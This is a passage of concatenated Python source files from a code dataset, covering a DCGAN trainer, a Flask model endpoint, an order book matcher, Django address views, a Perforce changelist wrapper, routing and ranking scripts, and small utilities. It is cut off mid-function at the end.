labels=tf.zeros([batch_size, 1, 1, 1])))\n D_loss = D_loss_real + D_loss_fake\n G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_logits, labels=tf.ones([batch_size, 1, 1, 1])))\n\n #trainable params\n T_vars = tf.trainable_variables()\n D_vars = [var for var in T_vars if 'discriminator' in var.name]\n G_vars = [var for var in T_vars if 'generator' in var.name]\n #we get all vars and then update all functions like relu before calculating loss after each training\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n D_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(D_loss, var_list=D_vars)\n G_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(G_loss, var_list=G_vars)\n sess = tf.InteractiveSession(config=tf.ConfigProto(allow_soft_placement=True, \n log_device_placement=True))\n tf.global_variables_initializer().run()\n\n #summary_writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())\n train_set = tf.image.resize_images(mnist.train.images, [64, 64]).eval()\n train_set = (train_set - 0.5) / 0.5 #-1 to 1 normalize\n\n root = job_dir+'MNIST_DCGAN_results/'\n model = 'MNIST_DCGAN_'\n \n saver = tf.train.Saver()\n\n # In[7]:\n \n \n for epoch in range(epochs):\n G_losses = []\n D_losses = []\n #epoch_start_time = time.time()\n for iter in range(mnist.train.num_examples // batch_size):\n # update discriminator\n x_ = train_set[iter*batch_size:(iter+1)*batch_size]\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\n\n loss_d_, _ = sess.run([D_loss, D_optim], {x: x_, z: z_, isTraining: True})\n D_losses.append(loss_d_)\n\n # update generator\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\n loss_g_, _ = sess.run([G_loss, G_optim], {z: z_, x: x_, isTraining: True})\n G_losses.append(loss_g_)\n\n saver.save(sess, './modelDCGAN'+str(epoch)+'.ckpt')\n with file_io.FileIO('./modelDCGAN'+str(epoch)+'.ckpt.data-00000-of-00001', mode='rb') as input_f :\n with file_io.FileIO(job_dir+'modelDCGAN'+str(epoch)+'.ckpt.data-00000-of-00001', mode='w+') as output_f:\n output_f.write(input_f.read())\n with file_io.FileIO('./modelDCGAN'+str(epoch)+'.ckpt.index', mode='rb') as input_f :\n with file_io.FileIO(job_dir+'modelDCGAN'+str(epoch)+'.ckpt.index', mode='w+') as output_f:\n output_f.write(input_f.read())\n with file_io.FileIO('./modelDCGAN'+str(epoch)+'.ckpt.meta', mode='rb') as input_f :\n with file_io.FileIO(job_dir+'modelDCGAN'+str(epoch)+'.ckpt.meta', mode='w+') as output_f:\n output_f.write(input_f.read())\n if epoch==9 :\n fixedZ = np.random.normal(0, 1, (25, 1, 1, 100))\n test_images = sess.run(G_z, {z: fixedZ, isTraining: False})\n k=0\n for im in test_images:\n im=np.reshape(im, (64, 64))\n k=k+1\n \n fixed_p = './'+model + str(k) + str(epoch + 1) + '.png'\n plt.imsave(fixed_p, im, cmap='gray')\n with file_io.FileIO(fixed_p, mode='rb') as input_f :\n with file_io.FileIO(job_dir+'result/imgepoch'+ str(epoch+1)+str(k)+ '.png' , mode='w+') as output_f:\n output_f.write(input_f.read())\n \n sess.close()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Input Arguments\n parser.add_argument(\n '--job-dir',\n help='GCS location to write checkpoints and export models',\n required=True\n )\n args = parser.parse_args()\n arguments = args.__dict__\n\n main(**arguments)\n","sub_path":"trainer/DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341426836","text":"import flask\nfrom flask import request\nimport tensorflow as tf\nimport keras\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\n\napp = flask.Flask(__name__)\n\ndef auc(y_true, y_pred):\n auc = tf.metrics.auc(y_true, y_pred)[1]\n keras.backend.get_session().run(tf.local_variables_initializer())\n return auc\n\n# load the model, and pass in the custom metric function\nglobal graph\ngraph = tf.get_default_graph()\nmodel = load_model('natgeo.h5', custom_objects={'auc': auc})\n\n\n# define a predict function as an endpoint \n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n data = {\"success\": False}\n # get the request parameters\n \n req_data = request.get_json()\n text = req_data['text']\n #print(text)\n tokenizer = Tokenizer(num_words=45000)\n tokenizer.fit_on_texts([text])\n x = tokenizer.texts_to_matrix([text], mode='tfidf')\n #print(x.shape)\n #print(x)\n with graph.as_default():\n y = model.predict(x)\n #print(y.shape)\n if (y[0][0] < 0.70):\n data[\"prediction\"] = \"release\"\n \n else:\n data[\"prediction\"] = \"contract\"\n data[\"success\"] = True\n data[\"confidence\"] = str(y[0][0])\n\n # return a response in json format \n return flask.jsonify(data) \n# start the flask app, allow remote connections\napp.run(host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231118200","text":"#\n# Copyright (c) 2018 Klemen Forstnerič\n#\n\nimport heapq\nimport time\nfrom orders import SellOrder, BuyOrder, ProcessedOrder, Snapshot\nfrom threading import Lock\n\n\nclass OrderBook:\n\n def __init__(self, user_storage):\n self._user_storage = user_storage\n\n self._lock = Lock()\n self._sell_orders = []\n self._buy_orders = []\n self._processed_orders = []\n\n def __get_price_for_one(self, sell_order, buy_order):\n # Which price we use depends on the timestamp of the orders.\n\n if sell_order.timestamp < buy_order.timestamp:\n return buy_order.price_for_one\n\n if sell_order.timestamp > buy_order.timestamp:\n return sell_order.price_for_one\n\n # In case both orders come at the same time, we average the bid and ask\n # price, to be fair to both users. :-)\n return (buy_order.price_for_one + sell_order.price_for_one) / 2\n\n def __get_current_timestamp(self):\n return time.time()\n\n def __process_sell_order_is_bigger(self, sell_order, buy_order):\n amount = buy_order.amount\n\n price_for_one = self.__get_price_for_one(sell_order, buy_order)\n bid_price_for_one = buy_order.price_for_one\n\n sell_order.amount -= amount\n sell_order.price = sell_order.price_for_one * sell_order.amount\n\n heapq.heappop(self._buy_orders)\n\n return ProcessedOrder(sell_order.seller_id, buy_order.buyer_id, amount,\n price_for_one, bid_price_for_one,\n self.__get_current_timestamp())\n\n def __process_buy_order_is_bigger(self, sell_order, buy_order):\n amount = sell_order.amount\n\n price_for_one = self.__get_price_for_one(sell_order, buy_order)\n bid_price_for_one = buy_order.price_for_one\n\n buy_order.amount -= amount\n buy_order.price = buy_order.price_for_one * buy_order.amount\n\n heapq.heappop(self._sell_orders)\n\n return ProcessedOrder(sell_order.seller_id, buy_order.buyer_id, amount,\n price_for_one, bid_price_for_one,\n self.__get_current_timestamp())\n\n def __process_orders_same_size(self, sell_order, buy_order):\n amount = sell_order.amount\n\n price_for_one = self.__get_price_for_one(sell_order, buy_order)\n bid_price_for_one = buy_order.price_for_one\n\n heapq.heappop(self._buy_orders)\n heapq.heappop(self._sell_orders)\n\n return ProcessedOrder(sell_order.seller_id, buy_order.buyer_id, amount,\n price_for_one, bid_price_for_one,\n self.__get_current_timestamp())\n\n def __update_users(self, processed_orders):\n for processed_order in processed_orders:\n seller_id = processed_order.seller_id\n buyer_id = processed_order.buyer_id\n\n seller_lock = self._user_storage.get_lock_for_user(seller_id)\n buyer_lock = self._user_storage.get_lock_for_user(buyer_id)\n\n with seller_lock and buyer_lock:\n seller = self._user_storage.get_user(seller_id)\n buyer = self._user_storage.get_user(buyer_id)\n\n amount = processed_order.amount\n price_for_one = processed_order.price_for_one\n bid_price_for_one = processed_order.bid_price_for_one\n\n price = price_for_one * amount\n bid_price = bid_price_for_one * amount\n\n seller.balance_usd += price\n buyer.balance_btc += amount\n\n # In case the buyer got this for a lower price, we put back the some of\n # the money.\n buyer.balance_usd += (bid_price - price)\n\n def __process_orders(self):\n processed_orders = []\n\n while self._sell_orders and self._buy_orders:\n sell_order = self._sell_orders[0]\n buy_order = self._buy_orders[0]\n\n # Can we even match anything?\n if sell_order.price_for_one > buy_order.price_for_one:\n break\n\n processed_order = None\n\n if sell_order.amount > buy_order.amount:\n processed_order = self.__process_sell_order_is_bigger(\n sell_order, buy_order)\n elif sell_order.amount < buy_order.amount:\n processed_order = self.__process_buy_order_is_bigger(\n sell_order, buy_order)\n else:\n processed_order = self.__process_orders_same_size(sell_order, buy_order)\n\n processed_orders.append(processed_order)\n\n self._processed_orders.extend(processed_orders)\n return processed_orders\n\n def add_sell_order(self, seller_id, amount, price):\n sell_order = SellOrder(seller_id, amount, price,\n self.__get_current_timestamp())\n\n # We keep sell orders in a min-heap.\n with self._lock:\n heapq.heappush(self._sell_orders, sell_order)\n\n def add_buy_order(self, buyer_id, amount, price):\n buy_order = BuyOrder(buyer_id, amount, price,\n self.__get_current_timestamp())\n\n # We keep buy orders in a max-heap.\n with self._lock:\n heapq.heappush(self._buy_orders, buy_order)\n\n def process_orders(self):\n processed_orders = None\n\n with self._lock:\n processed_orders = self.__process_orders()\n\n self.__update_users(processed_orders)\n\n def get_snapshot(self):\n with self._lock:\n return Snapshot(self._sell_orders, self._buy_orders,\n self._processed_orders)\n","sub_path":"order_book.py","file_name":"order_book.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"285181240","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 8 14:37:57 2020\n\n@author: Jérémie\n\"\"\"\nimport sys\n\ndef plot_flight(df,identification,datedebut,datefin):\n \"\"\"plot and save figure of the given flight (identification) among the flights of the dataset (df)\"\"\"\n\n # saving file and returning PATH\n PATH = \"E:/eDocuments/\\\"projet intégrateur\\\"/plot_radar_microservice\"\n PATH += \"/plots/\"+identification.replace(\" \",\"-\")+\"_\"+datedebut+\"_\"+datefin+\".png\" \n print(\"file:///\"+PATH.replace(\" \", \"%20\").replace(\"é\", \"%C3%A9\").replace(\"\\\"\", \"\").replace(\"\\\\\",\"\"))\n\n\n\n\n\ndef main(argv):\n \"\"\"plot radar and return path of the image\"\"\"\n \n # Deal with args\n if len(sys.argv) == 5:\n radar, datedebut, identification = sys.argv[1], sys.argv[2],str(sys.argv[3])+\" \"+str(sys.argv[4])\n datefin = datedebut\n elif len(sys.argv) == 6:\n radar, datedebut,datefin, identification = sys.argv[1], sys.argv[1], sys.argv[2], str(sys.argv[4])+\" \"+str(sys.argv[5])\n else:\n print('usage: python plotRadar.py @radar JJ-MM-YYYY JJ-MM-YYYY AI AA\\nusage: python plotRadar.py @radar JJ-MM-YYYY AI AA\\nexample: python plotRadar.py 01:00:5e:50:00:26 12-12-2020 TRA39U 4841AA')\n sys.exit(12)\n #datedebut, datefin, identification= \"12-12-2020\", \"12-12-2020\", \"TRA39U 4841AA\"#\"FPO6610 39666F\"VS\"JAF7FE 44A835\" #\"VLG8191 343194\"(landed)#\"TAR724 02A194\"#\"AFR1390 3991E1\" #\"AAF525 398005\"\n \n # Plot radar\n plot_flight(\"\",identification,datedebut,datefin)\n\n return 0\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n\n\n","sub_path":"scripts/plotRadar2.py","file_name":"plotRadar2.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"88384526","text":"import sys\nimport ast\nimport astunparse\n\n\ndef give_hint():\n \"\"\"输入格式\"\"\"\n print('Format:', file=sys.stderr)\n print('out-module-descriptions-file out-module-metadata-file '\n 'out-class-declarations-file out-class-descriptions-file out-class-metadata-file', file=sys.stderr)\n print('in-files-list', file=sys.stderr)\n sys.exit(-1)\n\n\ndef get_pretty_docstring(doc_str):\n \"\"\"整理docstring\"\"\"\n doc_str = doc_str.replace(\"DCQT\", \"DCQTDCQT\").replace(\"DCNL\", \"DCQTDCNL\")\n doc_str = doc_str.replace(\"'\", \"\\\\'\")\n rv_list = []\n for line in doc_str.split('\\n'):\n line = line.strip()\n # 如果这一行为空或者都是空字符\n if line == \"\" or (not any([c.isalnum() for c in line])):\n continue\n rv_list.append(line)\n unevaluated_pretty_docstring = \"'\" + \" DCNL \".join(rv_list) + \"'\"\n return unevaluated_pretty_docstring\n\n\ndef escape_control_string(line):\n \"\"\"转义控制字符\"\"\"\n return line.replace(\"DCQT\", \"DCQTDCQT\").replace(\"DCNL\", \"DCQTDCNL\")\n\n\ndef process_class(node, out_class_decl_fd, out_class_desc_fd, out_class_meta_fd, input_filename,\n parent_class_lineno=-1):\n doc_str = ast.get_docstring(node)\n # 将ast还原为str\n # 做split后前2个元素是'',所以索引从0 1 2的2开始\n unparsed_list = astunparse.unparse(node).split('\\n')\n # 获得decorator的数目\n n_classdef_decorator = len(node.decorator_list)\n unparsed_classdef = unparsed_list[2: 3 + n_classdef_decorator]\n pretty_docstring = get_pretty_docstring(doc_str) if doc_str is not None else \"DCNA\"\n classdef = \" DCNL \".join([escape_control_string(line) for line in unparsed_classdef])\n meta_str = input_filename + \" \" + str(node.lineno) + \" \" + str(parent_class_lineno)\n print(pretty_docstring, file=out_class_desc_fd)\n print(classdef, file=out_class_decl_fd)\n print(meta_str, file=out_class_meta_fd)\n for inner_node in node.body:\n if isinstance(inner_node, ast.ClassDef):\n process_class(inner_node, out_class_decl_fd, out_class_desc_fd, out_class_meta_fd, input_filename,\n node.lineno)\n\n\ndef process_module(in_fd, out_module_desc_fd, out_module_meta_fd, out_class_decl_fd, out_class_desc_fd,\n out_class_meta_fd, input_filename):\n\n module_str = in_fd.read()\n module_ast = ast.parse(module_str)\n doc_str = ast.get_docstring(module_ast)\n if doc_str is not None:\n pretty_docstring = get_pretty_docstring(doc_str)\n print(pretty_docstring, file=out_module_desc_fd)\n else:\n print(\"DCNA\", file=out_module_desc_fd)\n meta_str = input_filename\n print(meta_str, file=out_module_meta_fd)\n for node in module_ast.body:\n if isinstance(node, ast.ClassDef):\n process_class(node, out_class_decl_fd, out_class_desc_fd, out_class_meta_fd, input_filename)\n\n\ndef workflow():\n if len(sys.argv) < 6:\n give_hint()\n module_description_filename = sys.argv[1]\n module_meta_filename = sys.argv[2]\n class_decl_filename = sys.argv[3]\n class_description_filename = sys.argv[4]\n class_meta_filename = sys.argv[5]\n\n # 注释上讲open返回的是一个stream,即创建了几个文件流\n module_description_fd = open(module_description_filename, \"w\", encoding=\"UTF-8\")\n module_meta_fd = open(module_meta_filename, \"w\", encoding=\"UTF-8\")\n class_decl_fd = open(class_decl_filename, \"w\", encoding=\"UTF-8\")\n class_description_fd = open(class_description_filename, \"w\", encoding=\"UTF-8\")\n class_meta_fd = open(class_meta_filename, \"w\", encoding=\"UTF-8\")\n for line in sys.stdin:\n input_filename = line.strip()\n process_module(open(input_filename, encoding=\"UTF-8\"), module_description_fd, module_meta_fd, class_decl_fd,\n class_description_fd, class_meta_fd, input_filename)\n\n print('Done.')\n\n\nif __name__ == '__main__':\n workflow()\n","sub_path":"extract_module_class.py","file_name":"extract_module_class.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"510779538","text":"import numpy as np\nimport pandas as pd\nimport time\nimport multiprocessing as mp\nimport logging\nimport os\nprint('Number of Core :', mp.cpu_count())\n\nROOT_DIR = os.getcwd()\nlogging.basicConfig(\n filename=ROOT_DIR + '/output/info.log',\n level=logging.WARNING,\n format='%(asctime)s | %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n)\n\nclass VehicleRoutingArrangement:\n def __init__(self, node_names, distances_matrix, tasks):\n self.full_node_names = node_names\n self.node_names = node_names['name'].values\n self.distances = distances_matrix\n self.tasks = tasks\n\n def checkRemainingTasks(self, job_done):\n remaining_tasks = self.tasks.copy()\n if len(remaining_tasks) > 0:\n active_path = tasks['path'].values\n job_done = job_done[np.isin(job_done, active_path)]\n\n job_unique, job_counts = np.unique(job_done, return_counts=True)\n job_done_df = pd.DataFrame(\n {'path': job_unique, 'Count': job_counts})\n\n merged_df = remaining_tasks.merge(\n job_done_df, on='path', how='outer')\n merged_df.loc[merged_df['Count_y'].isnull(), 'Count_y'] = 0\n merged_df['Count'] = merged_df['Count_x'] - merged_df['Count_y']\n output = merged_df[merged_df['Count'] >\n 0][['Start', 'End', 'path', 'Count']]\n return output\n else:\n return remaining_tasks\n\n def startOrEnd(self, current_position, rm_task):\n start_set = rm_task['Start'].unique()\n if current_position in start_set:\n return rm_task[rm_task['Start'] == current_position]['End'].values\n else:\n return start_set\n\n def nextJobsMatrix(self, job_done, next_nodes):\n current_position = job_done[-1].split('-')[-1]\n next_jobs = current_position + '-' + next_nodes\n\n if len(job_done[0]) > 1:\n ini_mat = np.tile(job_done, (len(next_jobs), 1))\n output = np.hstack((ini_mat, np.array([next_jobs]).T))\n else:\n output = np.array([next_jobs]).T\n return output\n\n def jobMatrix(self, each_row):\n remaining_jobs = self.checkRemainingTasks(each_row)\n if len(remaining_jobs) == 0:\n job_matrix = np.append(each_row, '0')\n else:\n current_position = each_row[-1].split('-')[-1]\n next_nodes = self.startOrEnd(current_position, remaining_jobs)\n job_matrix = self.nextJobsMatrix(each_row, next_nodes)\n return job_matrix\n\n def currentPosition(self, x):\n return x.split('-')[-1]\n\n def getUniqueRows(self, output):\n # re-output to unique matrix\n old_output = output.copy()\n vCurrentPos = np.vectorize(self.currentPosition)\n last_position = old_output[:, -1]\n current_pos_arr = vCurrentPos(last_position)\n output.sort(axis=1)\n all_groups = pd.DataFrame({\n 'tasks': [\"\".join(i) for i in output.astype(str)],\n 'current_pos': list(current_pos_arr),\n 'id': range(len(current_pos_arr))}).groupby(['tasks', 'current_pos'])\n unique_index = all_groups.first()['id'].values\n output = old_output[unique_index, :]\n return output\n\n def allPath(self, output):\n # Pool Multiple Processing\n pool = mp.Pool(processes=23)\n last_column = output[:, -1]\n all_zero = sum(last_column == '0')\n while all_zero != len(last_column):\n start_time = time.time()\n output_list = pool.map(self.jobMatrix, output)\n output = np.vstack(output_list)\n output = self.getUniqueRows(output)\n\n last_column = output[:, -1]\n all_zero = sum(last_column == '0')\n\n stop_time = time.time() - start_time\n logging.warning('Output Matrix Shape :' + str(output.shape) +', Use Time :' + str(stop_time) + 's')\n np.save('output/output.npy', output)\n del output_list\n return output\n\n def getDistance(self, startEndStr):\n tasks_arr = self.tasks['path'].values\n if startEndStr == '0':\n return 0\n else:\n start, end = startEndStr.split('-')\n i, j = np.where(self.node_names == start)[\n 0][0], np.where(self.node_names == end)[0][0]\n return self.distances[i, j] if startEndStr in tasks_arr else -1*self.distances[i, j]\n\n def sumDistance(self, distance_arr):\n all_distances = sum(distance_arr)\n pos_distances = sum(distance_arr[distance_arr > 0])\n neg_distances = sum(distance_arr[distance_arr < 0])\n abs_distances = pos_distances + abs(neg_distances)\n return pos_distances, neg_distances, all_distances, abs_distances\n\n def allDistancePath(self, all_path):\n getDistanceAllElement = np.vectorize(self.getDistance)\n result_array = getDistanceAllElement(all_path)\n all_distance_path = np.apply_along_axis(\n self.sumDistance, 1, result_array)\n return all_distance_path\n\n def getTaskName(self, task_path):\n name_arr = self.full_node_names['name'].values\n only_task = task_path[task_path != '0']\n\n # แยกจุดเริ่ม-จบ\n def start_f(x): return x.split('-')[0]\n start_vf = np.vectorize(start_f)\n start_node = start_vf(only_task)\n\n def end_f(y): return y.split('-')[1]\n end_vf = np.vectorize(end_f)\n end_node = end_vf(only_task)\n\n row_num = len(only_task)\n\n name_list = []\n distance_list = []\n for i in range(row_num):\n # name\n start_name = self.full_node_names[self.full_node_names['name']\n == start_node[i]]['node'].values[0]\n end_name = self.full_node_names[self.full_node_names['name']\n == end_node[i]]['node'].values[0]\n name = start_name + '-' + end_name\n name_list.append(name)\n\n # distance\n start, end = start_node[i], end_node[i]\n m, n = np.where(name_arr == start)[\n 0][0], np.where(name_arr == end)[0][0]\n before_path = only_task[0:i]\n remaining_tasks = self.checkRemainingTasks(before_path)\n current_task = task_path[i]\n if current_task in remaining_tasks['path'].values:\n distance_list.append(self.distances[m, n])\n else:\n distance_list.append(-self.distances[m, n])\n\n return pd.DataFrame({'Name': name_list, 'Distance': distance_list})\n\n\nstart_point = np.array([['S']]) # start_point\nnode_names = pd.read_csv('data/node_names.csv')\ndistances = pd.read_csv('data/distances_matrix.csv', header=None).values\ntasks = pd.read_csv('data/tasks.csv')[['Start', 'End', 'Count']]\ntasks['path'] = tasks['Start'] + '-' + tasks['End']\n\nvehicleObj = VehicleRoutingArrangement(node_names, distances, tasks)\nall_path = vehicleObj.allPath(start_point)\nnp.save('output/all_path.npy', all_path)\n","sub_path":"script/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62033260","text":"# Python3 code to calculate age in years\nfrom datetime import date\n\ndef calculateAge(birthDate):\n today = date.today()\n age = today.year - birthDate.year -((today.month, today.day) <\n (birthDate.month, birthDate.day))\n return age\n\n# Driver code\n# print(calculateAge(date(1997, 2, 3)), \"years\")\n\nbirth_year = int(input(\"Enter Year of Birth \"))\nbirth_month = int(input(\"Enter Month of Birth \"))\nbirth_day = int(input(\"Enter day of Birth \"))\n\nage = calculateAge(date(birth_year, birth_month, birth_day))\ncandles_num = age % 10\ndashes_calc = int((18-candles_num)/2)\ndashes = '_' * dashes_calc\n\n\ndef cake(candles,dash):\n print(' ' + dash + 'i' * candles + dash + ' ')\n print(' | :H:a:p:p:y: |')\n print(' _|________________|_')\n print(' |^^^^^^^^^^^^^^^^^^|')\n print(' | :B:i:r:t:h:d:a:y:|')\n print(' | |')\n print(' ~~~~~~~~~~~~~~~~~~~~')\n\nif age % 4 == 0:\n cake(candles_num, dashes)*2\nelse:\n cake(candles_num, dashes)\n","sub_path":"Week4/Day2/DailyChallenge/DC.py","file_name":"DC.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315650640","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Addresses\nfrom .serializers import AddressesSerializer\nfrom rest_framework.parsers import JSONParser\n\n# Create your views here.\n@csrf_exempt\ndef address_list(request):\n if request.method == 'GET':\n query_set = Addresses.objects.all()\n serializer = AddressesSerializer(query_set, many=True)\n return JsonResponse(data=serializer.data, safe=False)\n \n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = AddressesSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n \n return JsonResponse(serializer.errors, status=400)\n \n@csrf_exempt\ndef address(request, pk):\n obj = Addresses.objects.get(pk=pk)\n if request.method == 'GET':\n serializer = AddressesSerializer(obj)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = AddressesSerializer(obj, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n \n elif request.method == 'DELETE':\n obj.delete()\n return HttpResponse(status=204)\n","sub_path":"project/backend/contactlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88565003","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nimport gevent.monkey\n\nfrom Logger import Logger\n\ngevent.monkey.patch_all(subprocess=True)\n\nimport gevent.subprocess\n\n\nclass PerforceConnectionError(Exception):\n pass\n\n\nclass Perforce:\n def __init__(self, server, port, p4_id, p4_pass, filelist_cnt, bot_name, encoding='utf-8'):\n self.logger = Logger('Perforce_' + bot_name)\n\n self.server = server\n self.port = str(port)\n self.p4_id = p4_id\n self.p4_pass = p4_pass\n self.filelist_cnt = int(filelist_cnt)\n self.encoding = encoding\n\n self.logger.info('Perforce', 'initialized')\n\n # p4 커맨드 처리\n def get_p4_data(self, command, *args):\n command = ['./p4', '-p', self.server + ':' + self.port, '-u', self.p4_id, '-P', self.p4_pass, command]\n p4 = gevent.subprocess.Popen(command + list(args), stdout=gevent.subprocess.PIPE, stderr=gevent.subprocess.PIPE)\n out, err = p4.communicate()\n\n if not out:\n out = ''\n if not err:\n err = ''\n\n out = out.split('\\n')\n err = err.split('\\n')\n\n if len(out) == 0:\n if len(err) != 0:\n self.logger.error('connection problem!')\n self.logger.error('===================')\n for line in err:\n self.logger.error('', line)\n self.logger.error('===================')\n\n raise PerforceConnectionError\n\n return out\n\n # 특정 사용자, 특정 기간에 대한 change_num 목록 반환\n def list_change_num(self, user, target_date_from, target_date_to):\n self.logger.info('get change_num list', user, target_date_from, target_date_to)\n try:\n out = self.get_p4_data('changes', '-u', user, target_date_from.strftime(\"@%Y/%m/%d:%H:%M:%S\") + ',' + target_date_to.strftime(\"@%Y/%m/%d:%H:%M:%S\"))\n except:\n self.logger.info('get change_num list', 'failed')\n raise\n\n change_list = []\n for line in out:\n change_list += re.findall(\"Change (\\d+) on (\\d+)\\/(\\d+)\\/(\\d+) by ([^ ]+)@([^ ]+) '.+'\", line)\n\n change_num_list = []\n for change in change_list:\n change_num, year, month, day, client, workspace = change\n change_num_list.append(change_num)\n\n self.logger.info('get change_num list', user, 'done')\n return change_num_list\n\n # 특정 사용자, 특정 기간에 대한 파일 수정 내역 반환\n def list_changelist(self, user, target_date_from, target_date_to):\n self.logger.info('get description list', user, target_date_from, target_date_to)\n\n change_num_list = self.list_change_num(user, target_date_from, target_date_to)\n\n rendered_changelists = []\n for change_num in change_num_list:\n try:\n out = self.get_p4_data('describe', str(change_num))\n except:\n self.logger.info('cannot get description', change_num)\n continue\n\n description = []\n filelist = []\n description_done = False\n\n change_info = out[0]\n out = out[1:]\n\n for line in out:\n if 'Affected files ...' in line:\n description_done = True\n continue\n if 'Differences ...' in line:\n break\n\n if description_done:\n filelist += re.findall('... (.+)', line)\n else:\n description.append(line.decode(self.encoding).strip())\n\n for i in range(len(filelist)):\n filelist[i] = filelist[i].decode(self.encoding)\n\n if len(filelist) > self.filelist_cnt:\n cnt = len(filelist)\n filelist = filelist[0:self.filelist_cnt]\n filelist.append(u'(... 이하 생략, 총 ' + unicode(cnt) + u' 파일)')\n\n description = description[1:-1]\n\n rendered_changelists.append({'change_info': change_info, 'num': change_num, 'description': description, 'filelist': filelist})\n\n return rendered_changelists\n","sub_path":"Perforce.py","file_name":"Perforce.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460839893","text":"import math\nimport lib\nclass Num:\n def __init__(i):\n i.mu = {}\n i.sum = {}\n i.m2 = {}\n i.var = {}\n i.n = {}\n i.x = {}\n i.label = {}\n i.name = []\n \nclass Div:\n def __init__(i):\n i.total = []\n i.cohen = []\n i.mittas = []\n i.a12 = []\n i.order = {}\n i.level = 0\n \ndef ranks(filename, a, outfile):\n outfile.write(\"\\n----|\"+ filename+\"|---------------------\\n\")\n f = open(filename)\n _Nums = Num()\n _Div = Div()\n obs(f,0,_Nums,_Div)\n rank(0,_Nums,_Div,a)\n maxv = len(_Div.order.keys())\n for i in range(maxv): \n i = maxv - i\n k = _Div.order[i]['=']\n outfile.write(k.ljust(18)+ ':mu'.ljust(5)+ ('%4.2f'%(_Nums.mu[k])).ljust(6)+ ':rank'.ljust(6)+ str(_Nums.label[k])+'\\n')\n \ndef obs(f, all, _Nums, _Div):\n now = all\n line = f.readline()\n while line:\n line = line.split()\n for i in line:\n if i[0].isdigit(): \n v = float(i)\n inc(v, now, _Nums)\n inc(v, all, _Nums)\n else: now = i\n line = f.readline()\n f.close()\n\n for i in _Nums.name:\n if i != all:\n temp={}\n temp['='] = i\n temp['x'] = _Nums.mu[i]\n _Div.order[i] = temp\n s = 0\n norder = {}\n while s < len(_Nums.name)-1:\n tmp = 10**17\n ind = 0\n s = s+1\n norder[s] = {}\n for i in _Div.order.keys():\n if tmp > _Div.order[i]['x']: \n tmp = _Div.order[i]['x']\n ind = i\n norder[s]['='] = _Div.order[ind]['=']\n norder[s]['x'] = _Div.order[ind]['x']\n del _Div.order[ind] \n _Div.order = norder \ndef inc(v, k, nums): \n nums.label[k] = 0\n if k not in nums.name:\n nums.name += [k]\n nums.n[k] = 0\n all = nums.n[k] = nums.n[k] + 1\n nums.x[k] = []\n nums.sum[k] = v\n delta = float(v)\n nums.mu[k] = float(delta/all)\n nums.m2[k] = 0\n nums.var[k] = 0\n else:\n all = nums.n[k] = nums.n[k] + 1\n nums.sum[k] = nums.sum[k] + v\n delta = v - nums.mu[k]\n nums.mu[k] = nums.mu[k] + delta/all\n nums.m2[k] = nums.m2[k] + float(delta*(v-nums.mu[k]))\n nums.var[k] = float(nums.m2[k])/float(all - 1 + lib.PINCH) \n nums.x[k] += [v] \n \ndef rank(all,nums,div,a):\n div.cohen = float(a[\"-cohen\"])*math.sqrt(nums.var[all])\n div.mittas = a[\"--mittas\"]\n div.a12 = a[\"-a12\"]\n div.level = 0\n div.total = nums.n[all]\n rdiv(1,len(div.order.keys()),1,nums, div)\n\n\ndef rdiv(lo, hi, c, nums, div):\n cut = divm(lo, hi, nums, div)\n if cut:\n div.level = div.level + 1\n c = rdiv(lo, cut-1, c, nums, div) + 1\n c = rdiv(cut, hi, c, nums, div)\n else:\n for i in range(lo, hi+1): nums.label[div.order[i]['=']] = c\n return c\n\ndef divInits(lo,hi,nums,div,num0,num1):\n b= div.order[lo][\"=\"]; \n num0.n[lo]= nums.n[b]; \n num0.sum[lo]= nums.sum[b]\n b= div.order[hi][\"=\"]; \n num1.n[hi]= nums.n[b]; \n 